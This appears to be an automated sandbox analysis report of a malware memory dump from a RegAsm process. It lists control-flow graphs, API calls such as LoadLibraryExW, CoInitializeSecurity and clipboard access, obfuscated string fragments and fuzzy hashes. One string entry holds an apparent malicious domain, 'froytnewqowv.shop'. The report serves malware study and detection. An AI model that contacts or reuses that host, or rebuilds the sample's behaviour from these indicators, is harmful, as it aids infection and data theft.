42efeb-42eff2 85->86 89->53 100 42eabf-42eaca 89->100 90->91 98 42ea63-42ea7b 90->98 91->89 99 42ea87-42eab2 91->99 104 42ede0-42ee0f 96->104 105 42ee11-42ee1c 96->105 98->89 99->89 100->53 100->65 104->104 104->105 109 42ee67-42ee74 105->109 110 42ee1e-42ee26 105->110 112 42efe5-42efe9 106->112 113 42eede-42eeea 106->113 111 42eea0-42eece 107->111 109->78 109->79 109->80 109->83 109->84 114 42ee30-42ee37 110->114 111->106 111->111 112->86 115 42eef0-42eef7 113->115 116 42ee40-42ee46 114->116 117 42ee39-42ee3c 114->117 118 42efcb-42efd1 115->118 119 42eefd-42ef00 115->119 116->109 122 42ee48-42ee64 call 433ae0 116->122 117->114 121 42ee3e 117->121 118->112 120 42efd3-42efe2 call 433ae0 118->120 119->115 123 42ef02 119->123 120->112 121->109 122->109 123->112
        APIs
        • SysAllocString.OLEAUT32(M'U!), ref: 0042E709
        • SysAllocString.OLEAUT32(338F3183), ref: 0042E7C9
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocString
        • String ID: 2B$4`[b$D%|'$M'U!$T#"]$`a$B
        • API String ID: 2525500382-440078741
        • Opcode ID: 01042571e4295641df4ca99b9b0eb7a99067cba1e493cd7028eceaa882cd31b4
        • Instruction ID: 4ea0f8461768fe1b52b4bb7f56d1ac6bcebf894173c0e48dd6f9671abf23832b
        • Opcode Fuzzy Hash: 01042571e4295641df4ca99b9b0eb7a99067cba1e493cd7028eceaa882cd31b4
        • Instruction Fuzzy Hash: 8432DB71608341DFD318DF26E890B2BB7E2FF89304F54892EE58687391C7399845CB9A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 278 433065-4330aa 279 4330dc-4330e8 LoadLibraryExW 278->279 280 4330ac-4330af 278->280 282 4335f8-4339cd 279->282 283 4330ee-433105 279->283 281 4330b0-4330da 280->281 281->279 281->281 283->282
        APIs
        • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 004330E4
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID: 60$d9$e~$|v
        • API String ID: 1029625771-4027691356
        • Opcode ID: 10d1f74b673baf5985357ac771ea983f42f2d8c5f04e1f47e768d300753d8b97
        • Instruction ID: a935d69bc0b41f50d49fbc911f171b254fced2c73b8748081bc11f002b6ad5dc
        • Opcode Fuzzy Hash: 10d1f74b673baf5985357ac771ea983f42f2d8c5f04e1f47e768d300753d8b97
        • Instruction Fuzzy Hash: 23118BB4A04656EFDB04CF68E8517AEBBB1BF4A301F205A2AE41177780C378A551CF99

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 285 42e490-42e4f5 286 42e4f7 285->286 287 42e53b-42e558 285->287 288 42e500-42e539 286->288 290 42e56a-42e5bb CoCreateInstance 287->290 291 42e55f 287->291 288->287 288->288 290->290 290->291 291->290
        APIs
        • CoCreateInstance.OLE32(00438A50,00000000,00000001,00438A40,00000000), ref: 0042E5B0
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: CreateInstance
        • String ID: ano$us$}6{
        • API String ID: 542301482-351957135
        • Opcode ID: af9b8c942e7e42f9d6f1a60f4fba51a431f067fa1e444dfa2c3067655a943ee9
        • Instruction ID: e57b08429114ab8adb8d7706089b0171d4839cc11fc5b81c39fe6ae305b1ab2d
        • Opcode Fuzzy Hash: af9b8c942e7e42f9d6f1a60f4fba51a431f067fa1e444dfa2c3067655a943ee9
        • Instruction Fuzzy Hash: C23156B0118301EFE320CF16D855B5BBBE4ABC6718F508A0DF5A81A291D7759909CFAA
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c3ba5f766fa66d119fab7447f670ac816e17a21b25af293fb5ac5c01c78e35f1
        • Instruction ID: 3240e43821d0b61d1503e16c6e48e9e4f25e53118969b799ed9cb0a1830fb43f
        • Opcode Fuzzy Hash: c3ba5f766fa66d119fab7447f670ac816e17a21b25af293fb5ac5c01c78e35f1
        • Instruction Fuzzy Hash: 093106327083244FD3155D39989023BBAA29BC5330FD9833EEE728B3C6D9794C49424A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 128 40ad00-40ad54 129 40ad96-40adb3 LoadLibraryExW call 432fa0 128->129 130 40ad56 128->130 134 40adb9-40aed9 call 4350c0 * 12 129->134 135 40b46a-40b476 129->135 131 40ad60-40ad94 130->131 131->129 131->131 160 40aee0-40aef8 call 42f000 134->160 163 40af00-40af07 160->163 163->163 164 40af09-40af1b 163->164 165 40af81-40af91 call 40b480 164->165 166 40af1d-40af26 164->166 174 40af97-40af9d 165->174 175 40b1d8-40b1e0 165->175 168 40af30-40af33 166->168 169 40af70-40af73 168->169 170 40af35-40af54 call 40d410 168->170 173 40af76-40af7a 169->173 181 40af56-40af5c 170->181 182 40af5e-40af64 170->182 173->165 174->160 177 40afa3-40b0a0 174->177 178 40b1e2-40b1e7 175->178 179 40b20f 175->179 183 40b0a2 177->183 184 40b0e4-40b0fd call 40ba60 177->184 185 40b1f0-40b202 178->185 180 40b218-40b224 CoInitializeEx 179->180 186 40b468 180->186 187 40b22a-40b244 CoInitializeSecurity 180->187 181->168 181->182 182->173 188 40b0b0-40b0e2 183->188 184->186 193 40b103-40b158 184->193 185->185 190 40b204-40b20d 185->190 186->135 187->186 192 40b24a-40b24f call 42e490 187->192 188->184 188->188 190->180 197 40b254-40b259 192->197 195 40b194-40b19f 193->195 196 40b15a 193->196 199 40b1a5-40b1a9 195->199 200 40b25e 195->200 198 40b160-40b192 196->198 197->135 198->195 198->198 201 40b1bb-40b1bf 199->201 202 40b260-40b262 200->202 203 40b1c5-40b1cc 201->203 204 40b45c-40b465 call 431bc0 201->204 202->204 205 40b268-40b291 202->205 207 40b1d2 203->207 208 40b1ce-40b1d0 203->208 204->186 209 40b293 205->209 210 40b2d6-40b2df 205->210 213 40b1b0-40b1b5 207->213 214 40b1d4-40b1d6 207->214 208->207 212 40b2a0-40b2d4 209->212 215 40b2e1-40b2eb 210->215 216 40b314-40b316 210->216 212->210 212->212 213->201 213->202 214->213 218 40b2f7-40b2fb 215->218 216->204 217 40b31c-40b324 216->217 219 40b330-40b338 217->219 218->204 220 40b301-40b308 218->220 219->219 223 40b33a-40b33c 219->223 221 40b30a-40b30c 220->221 222 40b30e 220->222 221->222 224 40b2f0-40b2f5 222->224 225 40b310-40b312 222->225 226 40b385-40b394 223->226 227 40b33e-40b340 223->227 224->216 224->218 225->224 229 40b3a0-40b3a7 226->229 228 40b366-40b371 227->228 230 40b373-40b37c 228->230 231 40b35a-40b364 228->231 229->229 232 40b3a9-40b3bf 229->232 235 40b350-40b358 230->235 236 40b37e-40b383 230->236 231->226 231->228 233 40b3c1 232->233 234 40b3fd-40b40d call 40b480 232->234 237 40b3c3-40b3c7 233->237 234->204 243 40b40f-40b41e 234->243 235->231 236->235 239 40b3f7-40b3fa 237->239 240 40b3c9-40b3e5 call 40d410 237->240 239->234 247 40b3e7-40b3ed 240->247 248 40b3ef-40b3f5 240->248 245 40b420-40b424 243->245 246 40b441-40b454 call 431bc0 243->246 249 40b430-40b43f 245->249 246->180 252 40b45a 246->252 247->237 247->248 248->234 249->246 249->249 252->186
        APIs
        • LoadLibraryExW.KERNELBASE(097D0B85,00000000,00000800), ref: 0040ADA2
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID: 03DB2D93F5C889480B6C4A7BCA26E53A$froytnewqowv.shop$+)$ca$sq$wu
        • API String ID: 1029625771-91587983
        • Opcode ID: 5208369c4dcec06519413012fe37efb1aa3758c617be9cb6b3c668bc697f39a3
        • Instruction ID: 06de89f56e014253771ed6bd20009a01ee4e50481b0b26ca403677980d132e40
        • Opcode Fuzzy Hash: 5208369c4dcec06519413012fe37efb1aa3758c617be9cb6b3c668bc697f39a3
        • Instruction Fuzzy Hash: 7902BDB05083408BD3109F15D89176FBBE1EF96708F14893EE8C56B392D37A9909CB9A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 375 409e20-409e35 call 409e90 call 432fe0 380 409e37 375->380 381 409e39-409e46 GetCurrentProcess call 42a640 375->381 382 409e7c-409e88 ExitProcess 380->382 385 409e48 381->385 386 409e4a-409e60 GetWindowInfo call 40ad00 381->386 388 409e75-409e7a call 4339f0 385->388 389 409e65-409e67 386->389 388->382 391 409e69 389->391 392 409e6b-409e70 call 40d590 call 40c1e0 389->392 391->388 392->388
        APIs
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Process$CurrentExit
        • String ID:
        • API String ID: 2333725396-0
        • Opcode ID: 8beac1b10a10fcb60d2c15c538357b023e3f4390b0938a41504a4b1295f7eb37
        • Instruction ID: e92a3a15cde9d33f0b01b50ebb84327ff7d382b2a0a0b898d37cd4e2278949f1
        • Opcode Fuzzy Hash: 8beac1b10a10fcb60d2c15c538357b023e3f4390b0938a41504a4b1295f7eb37
        • Instruction Fuzzy Hash: 5EF08271808210A6CA507B76DA0671EBB585F1134AF00053FFC86B12D3EBBC4D0596DF

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 397 42e5c2-42e60d 398 42e644-42e66b SysAllocString 397->398 399 42e60f 397->399 401 42e66f-42e671 398->401 400 42e610-42e642 399->400 400->398 400->400
        APIs
        • SysAllocString.OLEAUT32(73A571A2), ref: 0042E649
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocString
        • String ID: LM
        • API String ID: 2525500382-360198107
        • Opcode ID: 38003b24516042bbc94b6e810c6582e5f8c574b8805a4b935a1b46ab55797f0b
        • Instruction ID: 9c56c2a970dff23b316f10345c2b859af51562a1c236da72b5c263d0f6902ca3
        • Opcode Fuzzy Hash: 38003b24516042bbc94b6e810c6582e5f8c574b8805a4b935a1b46ab55797f0b
        • Instruction Fuzzy Hash: 1B11E0B01183809FE390DF2AD480A2ABBF5BF99704F905E1DF5D58B251CB3698158F2A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 448 431bc0-431bce 449 431c43-431c46 448->449 450 431bd5-431bf2 448->450 451 431c30-431c34 450->451 452 431bf4 450->452 454 431c37-431c3d RtlFreeHeap 451->454 453 431c00-431c2e 452->453 453->451 453->453 454->449
        APIs
        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 00431C3D
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: 96cb44eb8e78e60550010c4dfd45fbd262d49c272638a59c278a687f9f1d43aa
        • Instruction ID: fd74f894e10263e34cfde22a41f343e177c2c0a33c2df5347239aa2e5e324ff9
        • Opcode Fuzzy Hash: 96cb44eb8e78e60550010c4dfd45fbd262d49c272638a59c278a687f9f1d43aa
        • Instruction Fuzzy Hash: 6C0128742082409FD709EF18D5A0B2EBBE2EF95705F54892DE5D6477A1C6359820CB4A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 455 431b50-431b68 456 431b6a 455->456 457 431b9e-431bb8 RtlAllocateHeap 455->457 458 431b70-431b9c 456->458 458->457 458->458
        APIs
        • RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?), ref: 00431BAF
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 603f7e0ac9d1266857c86e07f246a9185f460025026d973efa19a00a4cb4f488
        • Instruction ID: 0e50d3fe381928564e07525a4f872a2990670cd4a2dba8882383f1d590287c2f
        • Opcode Fuzzy Hash: 603f7e0ac9d1266857c86e07f246a9185f460025026d973efa19a00a4cb4f488
        • Instruction Fuzzy Hash: 26F037342082409BD305EB08D890A1AFBE1EF9A704F508C2CE1C4833A1D235E861CB4A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 459 433ae0-433b12 LdrInitializeThunk
        APIs
        • LdrInitializeThunk.NTDLL(0040E847,?,00000001,?), ref: 00433B0E
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID:
        • API String ID: 2994545307-0
        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 460 42e67b-42e698 CoSetProxyBlanket
        APIs
        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0042E690
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: BlanketProxy
        • String ID:
        • API String ID: 3890896728-0
        • Opcode ID: 203b70b180ad9e660cbc1f092ec9a73003738fbe5921fb26d3dfc1c3b9ab78da
        • Instruction ID: 4129e2b7d000882c1cd8af2e5994b6dd96ef5b53f4f8a98c56b1b3f1b9daadc6
        • Opcode Fuzzy Hash: 203b70b180ad9e660cbc1f092ec9a73003738fbe5921fb26d3dfc1c3b9ab78da
        • Instruction Fuzzy Hash: CAD04C307D5304BEF2321B15EC17F0435157742F03F201124B3857C0E189F16650955E

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 461 431c47 RtlFreeHeap 463 431c43-431c46 461->463
        APIs
        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 00431C3D
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: 66674d721119f21f9124b38300556f790f6b7a62b535e1cc9ee2bde82ae9360b
        • Instruction ID: ed0dc53aba9088742e20c9261bb1a0451bd45e1837753ed52ead1390843da9fe
        • Opcode Fuzzy Hash: 66674d721119f21f9124b38300556f790f6b7a62b535e1cc9ee2bde82ae9360b
        • Instruction Fuzzy Hash: 34B01274044110ABEE202B048C05B3C3515FB45305FF01C94A819440B2C52B4C27A94D
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: #c2]$#s!m$%k(e$'w;q$({6u$,g.a$4`[b$4`[b$<=$A]$B9b?$DG$IJ$N5A;$S}$S}$S}$T%[+$X)Z/$\]$a!V'$j-D3$q1L7$y$}z$EC$IG$MK$U[
        • API String ID: 0-589778090
        • Opcode ID: 94d92c4924349bfd90a8ed7cbf4659672dc8df439f2081262bcbeb0d6f9d5108
        • Instruction ID: c35ca2dee0658185c9015c9ed00cb1c807d1e4ff02a7a80a9ab21c663aa53f25
        • Opcode Fuzzy Hash: 94d92c4924349bfd90a8ed7cbf4659672dc8df439f2081262bcbeb0d6f9d5108
        • Instruction Fuzzy Hash: 83B22FB454C381CBE334CF24D880B9BBBE1FB86344F20892DE5D99B251DB749985CB96
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: #c2]$#s!m$%k(e$'w;q$({6u$,g.a$4`[b$4`[b$<=$A]$B9b?$DG$IJ$N5A;$S}$S}$S}$T%[+$X)Z/$a!V'$j-D3$q1L7$y$}z$U[
        • API String ID: 0-1942266033
        • Opcode ID: e9d7d7dd9b980aca5cbe0089c144270dc13d3860817662602acb5ae783712f24
        • Instruction ID: 07ba7a0bb07a251972cf6de4fcd871efa2ac6c8edbb187dfd955594968fc0fea
        • Opcode Fuzzy Hash: e9d7d7dd9b980aca5cbe0089c144270dc13d3860817662602acb5ae783712f24
        • Instruction Fuzzy Hash: 25A21DB454C381CBE374CF24D880B9BBBE1FB86344F20892EE5D99B251DB749585CB86
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: ,"@$(kB$.L6g$:$<0;3$AMTN$ARYG$J,"$TP&S$VblR$]]G\$`{oj$h~4/$kjB
        • API String ID: 0-1212006987
        • Opcode ID: 5f15631d1cac4504fd17ca5f9270542b2c9d9c4be4b59d11bf18c1cb4c187726
        • Instruction ID: 105613bc0a269390a2d501d69158d34a6d24f4a9867d0093196b8eca7c5ac2f6
        • Opcode Fuzzy Hash: 5f15631d1cac4504fd17ca5f9270542b2c9d9c4be4b59d11bf18c1cb4c187726
        • Instruction Fuzzy Hash: 8243AA70204B928BD325CF39D4907A7FBE1AF56304F58896ED4EB8B782D739A405CB58
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: +O?7$- -8$3L$505*$<%$H:>+$L'22$T)%%$UWVZ$Yd&X$\&+($]3%!$eWA$z[ZY
        • API String ID: 0-1281373740
        • Opcode ID: 9a8c22301cd6ca288e7df442d9346b1ba0436b4ef17774872f9d10b05979d012
        • Instruction ID: 0cf14e733c09983e4f58af603d62bf5e7b8db451c0c0b36747adb4458b4a8ddf
        • Opcode Fuzzy Hash: 9a8c22301cd6ca288e7df442d9346b1ba0436b4ef17774872f9d10b05979d012
        • Instruction Fuzzy Hash: FA7286B010C3808FD315DF29D4916ABBBE1EF96314F188A2DE0D58B392D3799945CB9A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$4`[b$8A$HI$X\
        • API String ID: 0-3386483485
        • Opcode ID: ab81b5f76e5c31b5ecd69c3a4d3c7a3a9ec8b89c096aee1fec114e6d71a5f5e6
        • Instruction ID: ad75259700cf4d97123048375c98e2c7ddb2dc81fbb39e9c79de734c0b23ba54
        • Opcode Fuzzy Hash: ab81b5f76e5c31b5ecd69c3a4d3c7a3a9ec8b89c096aee1fec114e6d71a5f5e6
        • Instruction Fuzzy Hash: BF22B9B5608340DFE314DF29D891A2BBBF2EF85304F44192DE6C287392D7799855CB8A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: CLP3$IRTP$Yins$Yins$_BWA$uzCW$A
        • API String ID: 0-4293791791
        • Opcode ID: 08b0d5996bbc06e9606f902b1e9065bacadd22392e4a1fda9e0760b31cab768a
        • Instruction ID: 6f75a5293f6c8dc8c06376af50025527cf78e254a17a33353f832af2cb67b960
        • Opcode Fuzzy Hash: 08b0d5996bbc06e9606f902b1e9065bacadd22392e4a1fda9e0760b31cab768a
        • Instruction Fuzzy Hash: 6002C9B150C390CFD314DF28D89166BBBE1AF8A304F04886EE5C59B392D379D945CB5A
        APIs
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Clipboard$CloseDataLongOpenWindow
        • String ID:
        • API String ID: 1647500905-0
        • Opcode ID: af9980913aaa41910fe4db3d8a1af5581ef90ccb532b3b11c65d1085b221106b
        • Instruction ID: f3bed7bb2938886c872c89f1db8f713350d46f9f856d8c9e8a6c24be8a18eb13
        • Opcode Fuzzy Hash: af9980913aaa41910fe4db3d8a1af5581ef90ccb532b3b11c65d1085b221106b
        • Instruction Fuzzy Hash: 1141F370A08791CFD711AB78D44836FBFF0AB01354F44886ED8D697382D279A968C767
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: ()$AQ$BK6$eR
        • API String ID: 0-2805897768
        • Opcode ID: 64a76fbc59b9d6fa9f58c45b9b2c7e9799b78376d4cd2a8ff6658d7ba9b248b7
        • Instruction ID: 3e009d86c41a8e5f888119918b3bb96c684a2fa52100fe337d5d680d9c005bcb
        • Opcode Fuzzy Hash: 64a76fbc59b9d6fa9f58c45b9b2c7e9799b78376d4cd2a8ff6658d7ba9b248b7
        • Instruction Fuzzy Hash: 1BD132B46083818FC324CF28D990A6BB7F0FF86354F44592DE5D68B391D3B89855CB5A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "TC$BSC$bTC
        • API String ID: 0-2356633963
        • Opcode ID: 6eef2b899739d4526dde68c6a8a080e836e76891bc472aeef559d19ca519bc30
        • Instruction ID: 69ef8e821754257fb9db5d7b856a7f39bc0fefba0dca6425dea3b99a7b6eaae6
        • Opcode Fuzzy Hash: 6eef2b899739d4526dde68c6a8a080e836e76891bc472aeef559d19ca519bc30
        • Instruction Fuzzy Hash: A132D135E04222CFCB08CF68D8906AEB7B1FF89314F1A95B9D955A73A1C335AC45CB94
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "TC$BSC$bTC
        • API String ID: 0-2356633963
        • Opcode ID: 3d4e41c7689c4458d3ef6585da0d0000dbb027f20e567cfd839442e1caf56424
        • Instruction ID: 875ff94d9372009538aed9e01c9165dbcda83fc5fe1a36f9430a2bc79794d705
        • Opcode Fuzzy Hash: 3d4e41c7689c4458d3ef6585da0d0000dbb027f20e567cfd839442e1caf56424
        • Instruction Fuzzy Hash: 7932CF35E04226CFCB08CF68D8906AEB7B2FF89314F1A55B9D955A73A1C334AC45CB94
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "TC$BSC$bTC
        • API String ID: 0-2356633963
        • Opcode ID: 239e2f8a44c70cf25fb4eed84d32f25ed0451d23b055923932105d63293a1d13
        • Instruction ID: 9b4aacdd220cdbca5e13beec51703e45f11df1894f2df0dfad60f5e7dc0a79a8
        • Opcode Fuzzy Hash: 239e2f8a44c70cf25fb4eed84d32f25ed0451d23b055923932105d63293a1d13
        • Instruction Fuzzy Hash: 92029A35A18221CFCB08CF68D8906AEB7F2FB89314F19997DD949A7361C335AC45CB84
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "TC$BSC$bTC
        • API String ID: 0-2356633963
        • Opcode ID: ad8ba4ddada9e89937a9b33b80eee6f2e633da6bc08d0e823e4135d32fea2923
        • Instruction ID: e820248a10fcf665ecf827cd7a0b221f52ee38a0cc4d44d5cf97d7cc54f04038
        • Opcode Fuzzy Hash: ad8ba4ddada9e89937a9b33b80eee6f2e633da6bc08d0e823e4135d32fea2923
        • Instruction Fuzzy Hash: 3C02D475A086218FCB08CF68C89166EB7F2FF89314F19997ED956A7391C335AC04CB94
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "TC$BSC$bTC
        • API String ID: 0-2356633963
        • Opcode ID: 15706da95bd2f14a0141be2304f3fba4659a4bcecaf5064128986fb32acf9c1b
        • Instruction ID: 08c511294b169b6e61a93d32ab998cd916f284616cf1035bb8426c0af934e553
        • Opcode Fuzzy Hash: 15706da95bd2f14a0141be2304f3fba4659a4bcecaf5064128986fb32acf9c1b
        • Instruction Fuzzy Hash: B102BC35A082118FCB08CF68C8906AEB7F2FF89314F19997DD885A73A1C335AC05CB95
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: +=$V
        • API String ID: 0-153392263
        • Opcode ID: af00935d301ab4f4f484216089e961026b6bcf01f4342146fa69dfc9df2ba512
        • Instruction ID: 2b18c3752e8c2f4ee63feebe8fd4eaa300fb79681e4ddce98a8b23994ecc85b7
        • Opcode Fuzzy Hash: af00935d301ab4f4f484216089e961026b6bcf01f4342146fa69dfc9df2ba512
        • Instruction Fuzzy Hash: 9802BE715083408FD725DF28C890A1BBBE1EF8A308F14493EE58597392E73AD945CB9A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: &$z
        • API String ID: 0-617047151
        • Opcode ID: 6040b96a1f5a654688b6c45822350163bac576a9224c36ff33d26eec85dfcc51
        • Instruction ID: 7c1ca21b7faf2f000b322caec2cd08a22f7534bb650bfd55ea42e3097d8ce2df
        • Opcode Fuzzy Hash: 6040b96a1f5a654688b6c45822350163bac576a9224c36ff33d26eec85dfcc51
        • Instruction Fuzzy Hash: 38F1477050C3808BD325DF19D890B9FBBE5EF96308F14082EE5C987292D7799985CB6B
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$onml
        • API String ID: 0-2697692917
